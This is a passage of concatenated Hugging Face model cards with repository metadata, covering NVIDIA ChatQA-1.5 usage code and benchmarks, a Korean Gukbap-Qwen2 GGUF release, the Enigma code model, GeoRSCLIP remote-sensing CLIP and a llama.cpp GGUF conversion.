| QuAC | 29.69 | 34.16 | 36.96 | 40.29 | 41.82 | 39.73 | 38.82 |
| QReCC | 46.97 | 49.77 | 51.34 | 52.01 | 48.05 | 49.03 | 51.40 |
| CoQA | 76.61 | 69.71 | 76.98 | 77.42 | 78.57 | 76.46 | 78.44 |
| DoQA | 41.57 | 40.67 | 41.24 | 43.39 | 51.94 | 49.6 | 50.67 |
| ConvFinQA | 51.61 | 71.21 | 76.6 | 81.28 | 73.69 | 78.46 | 81.88 |
| SQA | 61.87 | 74.07 | 69.61 | 79.21 | 69.14 | 73.28 | 83.82 |
| TopioCQA | 45.45 | 53.77 | 49.72 | 45.09 | 50.98 | 49.96 | 55.63 |
| HybriDial* | 54.51 | 46.7 | 48.59 | 49.81 | 56.44 | 65.76 | 68.27 |
| INSCIT | 30.96 | 35.76 | 36.23 | 36.34 | 31.9 | 30.1 | 32.31 |
| Average (all) | 47.71 | 50.93 | 52.52 | 53.90 | 54.14 | 55.17 | 58.25 |
| Average (exclude HybriDial) | 46.96 | 51.40 | 52.95 | 54.35 | 53.89 | 53.99 | 57.14 |
Note that ChatQA-1.5 used some samples from the HybriDial training dataset. To ensure fair comparison, we also compare average scores excluding HybriDial. The data and evaluation scripts for ConvRAG can be found [here](https://huggingface.co/datasets/nvidia/ConvRAG-Bench).
## Prompt Format
<pre>
System: {System}
{Context}
User: {Question}
Assistant: {Response}
User: {Question}
Assistant:
</pre>
## How to use
### take the whole document as context
This can be applied to the scenario where the whole document can be fitted into the model, so that there is no need to run retrieval over the document.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
import torch
model_id = "nvidia/ChatQA-1.5-8B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")
messages = [
{"role": "user", "content": "what is the percentage change of the net income from Q4 FY23 to Q4 FY24?"}
]
document = """NVIDIA (NASDAQ: NVDA) today reported revenue for the fourth quarter ended January 28, 2024, of $22.1 billion, up 22% from the previous quarter and up 265% from a year ago.\nFor the quarter, GAAP earnings per diluted share was $4.93, up 33% from the previous quarter and up 765% from a year ago. Non-GAAP earnings per diluted share was $5.16, up 28% from the previous quarter and up 486% from a year ago.\nQ4 Fiscal 2024 Summary\nGAAP\n| $ in millions, except earnings per share | Q4 FY24 | Q3 FY24 | Q4 FY23 | Q/Q | Y/Y |\n| Revenue | $22,103 | $18,120 | $6,051 | Up 22% | Up 265% |\n| Gross margin | 76.0% | 74.0% | 63.3% | Up 2.0 pts | Up 12.7 pts |\n| Operating expenses | $3,176 | $2,983 | $2,576 | Up 6% | Up 23% |\n| Operating income | $13,615 | $10,417 | $1,257 | Up 31% | Up 983% |\n| Net income | $12,285 | $9,243 | $1,414 | Up 33% | Up 769% |\n| Diluted earnings per share | $4.93 | $3.71 | $0.57 | Up 33% | Up 765% |"""
def get_formatted_input(messages, context):
system = "System: This is a chat between a user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions based on the context. The assistant should also indicate when the answer cannot be found in the context."
instruction = "Please give a full and complete answer for the question."
for item in messages:
if item['role'] == "user":
## only apply this instruction for the first user turn
item['content'] = instruction + " " + item['content']
break
conversation = '\n\n'.join(["User: " + item["content"] if item["role"] == "user" else "Assistant: " + item["content"] for item in messages]) + "\n\nAssistant:"
formatted_input = system + "\n\n" + context + "\n\n" + conversation
return formatted_input
formatted_input = get_formatted_input(messages, document)
tokenized_prompt = tokenizer(tokenizer.bos_token + formatted_input, return_tensors="pt").to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(input_ids=tokenized_prompt.input_ids, attention_mask=tokenized_prompt.attention_mask, max_new_tokens=128, eos_token_id=terminators)
response = outputs[0][tokenized_prompt.input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
### run retrieval to get top-n chunks as context
This can be applied to the scenario when the document is very long, so that it is necessary to run retrieval. Here, we use our [Dragon-multiturn](https://huggingface.co/nvidia/dragon-multiturn-query-encoder) retriever which can handle conversatinoal query. In addition, we provide a few [documents](https://huggingface.co/nvidia/ChatQA-1.5-8B/tree/main/docs) for users to play with.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM, AutoModel
import torch
import json
## load ChatQA-1.5 tokenizer and model
model_id = "nvidia/ChatQA-1.5-8B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")
## load retriever tokenizer and model
retriever_tokenizer = AutoTokenizer.from_pretrained('nvidia/dragon-multiturn-query-encoder')
query_encoder = AutoModel.from_pretrained('nvidia/dragon-multiturn-query-encoder')
context_encoder = AutoModel.from_pretrained('nvidia/dragon-multiturn-context-encoder')
## prepare documents, we take landrover car manual document that we provide as an example
chunk_list = json.load(open("docs.json"))['landrover']
messages = [
{"role": "user", "content": "how to connect the bluetooth in the car?"}
]
### running retrieval
## convert query into a format as follows:
## user: {user}\nagent: {agent}\nuser: {user}
formatted_query_for_retriever = '\n'.join([turn['role'] + ": " + turn['content'] for turn in messages]).strip()
query_input = retriever_tokenizer(formatted_query_for_retriever, return_tensors='pt')
ctx_input = retriever_tokenizer(chunk_list, padding=True, truncation=True, max_length=512, return_tensors='pt')
query_emb = query_encoder(**query_input).last_hidden_state[:, 0, :]
ctx_emb = context_encoder(**ctx_input).last_hidden_state[:, 0, :]
## Compute similarity scores using dot product and rank the similarity
similarities = query_emb.matmul(ctx_emb.transpose(0, 1)) # (1, num_ctx)
ranked_results = torch.argsort(similarities, dim=-1, descending=True) # (1, num_ctx)
## get top-n chunks (n=5)
retrieved_chunks = [chunk_list[idx] for idx in ranked_results.tolist()[0][:5]]
context = "\n\n".join(retrieved_chunks)
### running text generation
formatted_input = get_formatted_input(messages, context)
tokenized_prompt = tokenizer(tokenizer.bos_token + formatted_input, return_tensors="pt").to(model.device)
terminators = [
tokenizer.eos_token_id,
tokenizer.convert_tokens_to_ids("<|eot_id|>")
]
outputs = model.generate(input_ids=tokenized_prompt.input_ids, attention_mask=tokenized_prompt.attention_mask, max_new_tokens=128, eos_token_id=terminators)
response = outputs[0][tokenized_prompt.input_ids.shape[-1]:]
print(tokenizer.decode(response, skip_special_tokens=True))
```
## Correspondence to
Zihan Liu ([email protected]), Wei Ping ([email protected])
## Citation
<pre>
@article{liu2024chatqa,
title={ChatQA: Building GPT-4 Level Conversational QA Models},
author={Liu, Zihan and Ping, Wei and Roy, Rajarshi and Xu, Peng and Lee, Chankyu and Shoeybi, Mohammad and Catanzaro, Bryan},
journal={arXiv preprint arXiv:2401.10225},
year={2024}}
</pre>
## License
The use of this model is governed by the [META LLAMA 3 COMMUNITY LICENSE AGREEMENT](https://llama.meta.com/llama3/license/)
|
RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf | RichardErkhov | 2024-10-10T09:17:43Z | 114 | 0 | null | [
"gguf",
"arxiv:2305.11206",
"arxiv:2304.12244",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T06:04:41Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Gukbap-Qwen2-7B - GGUF
- Model creator: https://huggingface.co/HumanF-MarkrAI/
- Original model: https://huggingface.co/HumanF-MarkrAI/Gukbap-Qwen2-7B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Gukbap-Qwen2-7B.Q2_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q2_K.gguf) | Q2_K | 2.81GB |
| [Gukbap-Qwen2-7B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_XS.gguf) | IQ3_XS | 3.12GB |
| [Gukbap-Qwen2-7B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_S.gguf) | IQ3_S | 3.26GB |
| [Gukbap-Qwen2-7B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_S.gguf) | Q3_K_S | 3.25GB |
| [Gukbap-Qwen2-7B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ3_M.gguf) | IQ3_M | 3.33GB |
| [Gukbap-Qwen2-7B.Q3_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K.gguf) | Q3_K | 3.55GB |
| [Gukbap-Qwen2-7B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_M.gguf) | Q3_K_M | 3.55GB |
| [Gukbap-Qwen2-7B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q3_K_L.gguf) | Q3_K_L | 3.81GB |
| [Gukbap-Qwen2-7B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ4_XS.gguf) | IQ4_XS | 3.96GB |
| [Gukbap-Qwen2-7B.Q4_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_0.gguf) | Q4_0 | 4.13GB |
| [Gukbap-Qwen2-7B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.IQ4_NL.gguf) | IQ4_NL | 4.16GB |
| [Gukbap-Qwen2-7B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K_S.gguf) | Q4_K_S | 4.15GB |
| [Gukbap-Qwen2-7B.Q4_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K.gguf) | Q4_K | 4.36GB |
| [Gukbap-Qwen2-7B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_K_M.gguf) | Q4_K_M | 4.36GB |
| [Gukbap-Qwen2-7B.Q4_1.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q4_1.gguf) | Q4_1 | 4.54GB |
| [Gukbap-Qwen2-7B.Q5_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_0.gguf) | Q5_0 | 4.95GB |
| [Gukbap-Qwen2-7B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K_S.gguf) | Q5_K_S | 4.95GB |
| [Gukbap-Qwen2-7B.Q5_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K.gguf) | Q5_K | 5.07GB |
| [Gukbap-Qwen2-7B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_K_M.gguf) | Q5_K_M | 5.07GB |
| [Gukbap-Qwen2-7B.Q5_1.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q5_1.gguf) | Q5_1 | 5.36GB |
| [Gukbap-Qwen2-7B.Q6_K.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q6_K.gguf) | Q6_K | 5.82GB |
| [Gukbap-Qwen2-7B.Q8_0.gguf](https://huggingface.co/RichardErkhov/HumanF-MarkrAI_-_Gukbap-Qwen2-7B-gguf/blob/main/Gukbap-Qwen2-7B.Q8_0.gguf) | Q8_0 | 7.54GB |
Original model description:
---
library_name: transformers
tags: []
---
# HumanF-MarkrAI/Gukbap-Qwen2-7B🍚
## Model Details🍚
### Model Description
- **Developed by:** HumanF-MarkrAI
- **Model type:** Ko-Qwen2-7B
- **Language(s):** Korean
- **Context Length:** 8192
- **License:** cc-by-nc-4.0
- **Finetuned from model:** [Qwen/Qwen2-7B-Instruct](https://huggingface.co/Qwen/Qwen2-7B-Instruct).
### Model Sources
When training, we used `A100 40GB GPU`x4.
### Implications🍚
**Achieving Top-Level Korean Language Performance Surpassing GPT-4 Using Only Open-Source LLMs🔥**
Recently, numerous state-of-the-art (SOTA) models **have leveraged data generated by private models (e.g., ChatGPT, GPT-4) for LLM training,** as seen in projects like `OpenOrca`, `Ultrafeedback`, and `OpenHermes`.
However, this approach **may violate these private models' terms of service (ToS).**
For instance, OpenAI's license explicitly states: **"⚠️Use Limitation: Creating services that compete with OpenAI.⚠️"**
This implies that using data generated by private models to create unrestricted, open LLMs is challenging.
In this context, our model is significant in that **it has been trained solely on a proprietary dataset generated through open-source models.**** Furthermore, it achieved an impressive score of **🔥6.70🔥** in the korean logickor evaluation, **the SOTA for korean based LLM under <7B parameters.**
The **Gukbap-Series LLM🍚** was developed using the data processing and supervised fine-tuning (SFT) methods proposed by **LIMA** and **WizardLM.** This demonstrates **⭐the potential to create unrestricted, general-purpose LLMs using datasets generated solely with open-source LLMs.⭐**
<details>
<summary> 한국어버전 </summary>
**오픈소스 LLM만으로 데이터를 생성하여 GPT-4를 넘어 한국어 최고 레벨을 달성🔥**
오늘날 수많은 여러 SOTA 모델들은 **private model (ChatGPT, GPT4 등)을 활용하여 생성한 데이터를 통해 LLM 훈련**을 진행하고 있습니다. (OpenOrca, Ultrafeedback, OpenHermes 등)
하지만, 이는 **private model의 이용 약관에 위배**될 수도 있습니다. 대표적으로 OpenAI의 license에는 다음과 같은 말이 명시되어 있습니다: **"⚠️사용 제한: OpenAI의 경쟁하기 위한 서비스를 만드는 것.⚠️"** 즉, private model을 통해 만든 데이터로는 제약이 없는 자유로운 LLM을 만들기는 힘듭니다.
이러한 관점에서 우리 모델은 **오직 오픈소스을 통해 생성힌 자체 데이터셋로 학습했다는 것**에 큰 의의가 있습니다. 또한 한국어 logickor 자체 평가에서 **🔥6.70🔥**이라는 고득점을 달성하였고, 이는 **7B 이하 한국어 모델 중 SOTA**입니다.
**Gukbap-Series LLM🍚**은 **LIMA**와 **WizardLM**에서 제안한 데이터 가공 및 SFT 훈련 방법을 통해 제작되었으며, **⭐오픈소스 LLM만으로 데이터셋을 만들어서 제약이 없는 자체 general LLM을 만들 수 있다는 가능성⭐**을 보여줍니다.
</details>
### Training Method (SFT)
The following papers contain the foundational methodologies for the dataset and training methods we are currently proceeding.
- [LIMA](https://arxiv.org/abs/2305.11206).
- [WizardLM](https://arxiv.org/abs/2304.12244).
- [Near Dedup](https://arxiv.org/abs/2304.12244).
### SFT Datasets (Private)
When we made the `Open-Source based dataset`, we use `microsoft/WizardLM-2-8x22B` through [DeepInfra](https://deepinfra.com/).
Our datasets are made by `Evolving system`, which is propsed by [WizardLM](https://wizardlm.github.io/WizardLM2/).
In training, we used 1849 training dataset, and 200 validation dataset.
- **Wizard-Korea-Datasets:** [MarkrAI/Markr_WizardLM_train_ver4](https://huggingface.co/datasets/MarkrAI/Markr_WizardLM_train_ver4).
- **Wizard-Korea-Valid:** [WizardLM_Evol_valid](https://huggingface.co/datasets/MarkrAI/WizardLM_Evol_valid).
> Validation loss (epoch 15; Learning rate: 1e-5): 1.0040
### Benchmark Score (Zero-shot)
We internally evaluated [LogicKor](https://github.com/instructkr/LogicKor).
We utilized [**gpt-4-1106-preview**](https://platform.openai.com/docs/models/gpt-4-turbo-and-gpt-4) in internal evaluation.
It is same manner as `Logickor-v2 eval model`.
> (GPT-4o occasionally makes errors when grading. For example, it sometimes assigns a score of 0 for English responses to questions that were supposed to be answered in English.)
| Model | 추론 | 수학 | 글쓰기 | 코딩 | 이해 | 문법 | **싱글턴** | **멀티턴** | **Overall** |
|:---------:|:-----:|:------:|:-----:|:-----:|:----:|:-----:|:-----:|:-----:|:----:|
| [OpenAI/gpt-4o-2024-05-13](https://lk.instruct.kr/832k1b3wb3x00e4?file=default_xwfHncVI2v.jsonl) | 9.50 | 8.71 | 9.42 | 9.21 | 9.71 | 9.42 | 9.42 | 9.23 | 9.33 |
| [Anthropic/clauide-3-5-sonnet-20240620](https://lk.instruct.kr/rf8n4j9h6vg1bq7?file=1_shot_R6talIb9Cq.jsonl) | 8.64 | 8.42 | 9.85 | 9.78 | 9.92 | 9.21 | 9.26 | 9.35 | 9.30 |
| [google/gemini-1.5-pro-001](https://lk.instruct.kr/d54q3zaydbamaos?file=default_zE0CfbdTR3.jsonl) | 9.07 | 8.57 | 9.57 | 9.78 | 9.57 | 9.21 | 9.40 | 9.19 | 9.23 |
|----|----|----|----|----|----|----|----|----|----|
| **Gukbap-Qwen2-7B🍚** | 5.71 | **6.43** | **8.07** | **9.14** | 7.29 | 3.57 | **7.02** | **6.38** | **6.70** |
| [mirlab/AkaLlama-llama3-70b-v0.1](https://lk.instruct.kr/p9nzhh5ct0strpo?file=default_1ya4ZKRlUm.jsonl) | 5.14 | 5.35 | 4.14 | 9.00 | 7.85 | **7.50** | 5.97 | 7.02 | 6.50 |
| [Qwen/Qwen2-7B-Instruct](https://lk.instruct.kr/gx4p1k3jojt977d?file=default_guHriJEiaj.jsonl) | **6.07** | 4.71 | 7.21 | 7.00 | 8.00 | 4.85 | 6.61 | 6.00 | 6.30 |
| [yanolja/EEVE-Korean-Instruct-10.8B-v1.0](https://lk.instruct.kr/tnn389my7sa36a7?file=default_bXVomDLocN.jsonl) | 6.00 | 3.64 | 6.64 | 5.64 | **8.42** | 5.85 | 6.61 | 5.45 | 6.01 |
If you want to check model's output, please see our [⭐answer⭐](https://huggingface.co/HumanF-MarkrAI/Gukbap-Qwen-7B/blob/main/Gukbap-Qwen-7B_0.jsonl) file!!
### Benchmark Comparison about 3 Prompt Strategy
| Model (type) | 추론 | 수학 | 글쓰기 | 코딩 | 이해 | 문법 | **싱글턴** | **멀티턴** | **Overall** |
|:---------:|:-----:|:------:|:-----:|:-----:|:----:|:-----:|:-----:|:-----:|:----:|
| **Gukbap-Qwen2-7B🍚 (cot-1-shot)** | 7.07 | 5.71 | **8.86** | 9.00 | **8.07** | **3.86** | **7.79** | 6.40 | **7.10** |
| Gukbap-Qwen2-7B🍚 (1-shot) | **7.50** | 6.00 | 7.86 | 8.71 | 7.21 | 3.57 | 7.10 | **6.52** | 6.81 |
| Gukbap-Qwen2-7B🍚 (0-shot) | 5.71 | **6.43** | 8.07 | **9.14** | 7.29 | 3.57 | 7.02 | 6.38 | 6.70 |
You can find the prompt strategy through logickor [templates](https://github.com/instructkr/LogicKor/blob/main/templates.py#L1).
### Benchmark Code
Our code based on maywell's [Logickor code](https://github.com/instructkr/LogicKor).
We followed maywell's evaluation method such as `judge_template`, `prompt`, etc.
### Chat Prompt
```yaml
<|im_start|>user
Hello! My favorite food is Gukbap🍚!<|im_end|>
<|im_start|>assistant
(model answer)
```
### Gukbap-Series models🍚🍚
- [Gukbap-Mistral-7B🍚](https://huggingface.co/HumanF-MarkrAI/Gukbap-Mistral-7B)
- [Gukbap-Gemma-9B🍚](https://huggingface.co/HumanF-MarkrAI/Gukbap-Gemma2-9B)
### BibTeX
```
@article{HumanF-MarkrAI,
title={Gukbap-Qwen2-7B},
author={MarkrAI},
year={2024},
url={https://huggingface.co/HumanF-MarkrAI}
}
```
|
mav23/Llama3.2-3B-Enigma-GGUF | mav23 | 2024-10-10T09:07:24Z | 146 | 1 | null | [
"gguf",
"enigma",
"valiant",
"valiant-labs",
"llama",
"llama-3.2",
"llama-3.2-instruct",
"llama-3.2-instruct-3b",
"llama-3",
"llama-3-instruct",
"llama-3-instruct-3b",
"3b",
"code",
"code-instruct",
"python",
"conversational",
"chat",
"instruct",
"text-generation",
"en",
"dataset:sequelbox/Tachibana",
"dataset:sequelbox/Supernova",
"base_model:meta-llama/Llama-3.2-3B-Instruct",
"base_model:quantized:meta-llama/Llama-3.2-3B-Instruct",
"license:llama3.2",
"model-index",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T08:42:22Z | ---
language:
- en
license: llama3.2
tags:
- enigma
- valiant
- valiant-labs
- llama
- llama-3.2
- llama-3.2-instruct
- llama-3.2-instruct-3b
- llama-3
- llama-3-instruct
- llama-3-instruct-3b
- 3b
- code
- code-instruct
- python
- conversational
- chat
- instruct
base_model: meta-llama/Llama-3.2-3B-Instruct
datasets:
- sequelbox/Tachibana
- sequelbox/Supernova
pipeline_tag: text-generation
model_type: llama
model-index:
- name: Llama3.2-3B-Enigma
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-Shot)
type: winogrande
args:
num_few_shot: 5
metrics:
- type: acc
value: 67.96
name: acc
- task:
type: text-generation
name: Text Generation
dataset:
name: ARC Challenge (25-Shot)
type: arc-challenge
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 47.18
name: normalized accuracy
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.75
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 18.81
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 6.65
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 1.45
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 4.54
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 15.41
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=ValiantLabs/Llama3.2-3B-Enigma
name: Open LLM Leaderboard
---

Enigma is a code-instruct model built on Llama 3.2 3b.
- High quality code instruct performance with the Llama 3.2 Instruct chat format
- Finetuned on synthetic code-instruct data generated with Llama 3.1 405b. [Find the current version of the dataset here!](https://huggingface.co/datasets/sequelbox/Tachibana)
- Overall chat performance supplemented with [generalist synthetic data.](https://huggingface.co/datasets/sequelbox/Supernova)
## Version
This is the **2024-09-30** release of Enigma for Llama 3.2 3b, enhancing code-instruct and general chat capabilities.
Enigma is also available for [Llama 3.1 8b!](https://huggingface.co/ValiantLabs/Llama3.1-8B-Enigma)
Help us and recommend Enigma to your friends! We're excited for more Enigma releases in the future.
## Prompting Guide
Enigma uses the [Llama 3.2 Instruct](https://huggingface.co/meta-llama/Llama-3.2-3B-Instruct) prompt format. The example script below can be used as a starting point for general chat:
```python
import transformers
import torch
model_id = "ValiantLabs/Llama3.2-3B-Enigma"
pipeline = transformers.pipeline(
"text-generation",
model=model_id,
model_kwargs={"torch_dtype": torch.bfloat16},
device_map="auto",
)
messages = [
{"role": "system", "content": "You are Enigma, a highly capable code assistant."},
{"role": "user", "content": "Can you explain virtualization to me?"}
]
outputs = pipeline(
messages,
max_new_tokens=1024,
)
print(outputs[0]["generated_text"][-1])
```
## The Model
Enigma is built on top of Llama 3.2 3b Instruct, using high quality code-instruct data and general chat data in Llama 3.2 Instruct prompt style to supplement overall performance.
Our current version of Enigma is trained on code-instruct data from [sequelbox/Tachibana](https://huggingface.co/datasets/sequelbox/Tachibana) and general chat data from [sequelbox/Supernova.](https://huggingface.co/datasets/sequelbox/Supernova)

Enigma is created by [Valiant Labs.](http://valiantlabs.ca/)
[Check out our HuggingFace page for Shining Valiant 2 and our other Build Tools models for creators!](https://huggingface.co/ValiantLabs)
[Follow us on X for updates on our models!](https://twitter.com/valiant_labs)
We care about open source.
For everyone to use.
We encourage others to finetune further from our models.
|
Zilun/GeoRSCLIP | Zilun | 2024-10-10T09:06:08Z | 0 | 10 | null | [
"en",
"dataset:Zilun/RS5M",
"license:cc",
"region:us"
] | null | 2023-11-23T20:14:34Z | ---
license: cc
datasets:
- Zilun/RS5M
language:
- en
metrics:
- accuracy
- recall
---
## GeoRSCLIP Model
* **GeoRSCLIP with ViT-B-32 and ViT-H-14 backbone**
* **GeoRSCLIP-FT for retrieval**
### Installation
* Install Pytorch following instructions from the official website (We tested in torch 2.0.1 with CUDA 11.8 and 2.1.0 with CUDA 12.1)
```bash
pip install torch==2.0.1 torchvision==0.15.2 torchaudio==2.0.2 --index-url https://download.pytorch.org/whl/cu118
```
* Install other dependencies
```bash
pip install pillow pandas scikit-learn ftfy tqdm matplotlib transformers adapter-transformers open_clip_torch pycocotools timm clip-benchmark torch-rs
```
### Usage
* Clone the repo from: https://huggingface.co/Zilun/GeoRSCLIP
```bash
git clone https://huggingface.co/Zilun/GeoRSCLIP
cd GeoRSCLIP
```
* Unzip the test data
```bash
unzip data/rs5m_test_data.zip
```
* Run the inference script:
```bash
python codebase/inference.py --ckpt-path /your/local/path/to/RS5M_ViT-B-32.pt --test-dataset-dir /your/local/path/to/rs5m_test_data
```
* (Optional) If you just want to load the GeoRSCLIP model:
```python
import open_clip
import torch
from inference_tool import get_preprocess
ckpt_path = "/your/local/path/to/RS5M_ViT-B-32.pt"
model, _, _ = open_clip.create_model_and_transforms("ViT-B/32", pretrained="openai")
checkpoint = torch.load(ckpt_path, map_location="cpu")
msg = model.load_state_dict(checkpoint, strict=False)
model = model.to("cuda")
img_preprocess = get_preprocess(
image_resolution=224,
)
```
```python
import open_clip
import torch
from inference_tool import get_preprocess
ckpt_path = "/your/local/path/to/RS5M_ViT-H-14.pt"
model, _, _ = open_clip.create_model_and_transforms("ViT-H/14", pretrained="laion2b_s32b_b79k")
checkpoint = torch.load(ckpt_path, map_location="cpu")
msg = model.load_state_dict(checkpoint, strict=False)
model = model.to("cuda")
img_preprocess = get_preprocess(
image_resolution=224,
)
``` |
aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF | aimlresearch2023 | 2024-10-10T08:54:36Z | 458 | 1 | transformers | [
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:AI-ML-Research/llama-3.2-1b-it-merged",
"base_model:quantized:AI-ML-Research/llama-3.2-1b-it-merged",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T08:54:30Z | ---
base_model: AiisNothing/llama-3.3-1b-it-merged
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- llama-cpp
- gguf-my-repo
---
# aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF
This model was converted to GGUF format from [`AiisNothing/llama-3.3-1b-it-merged`](https://huggingface.co/AiisNothing/llama-3.3-1b-it-merged) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/AiisNothing/llama-3.3-1b-it-merged) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
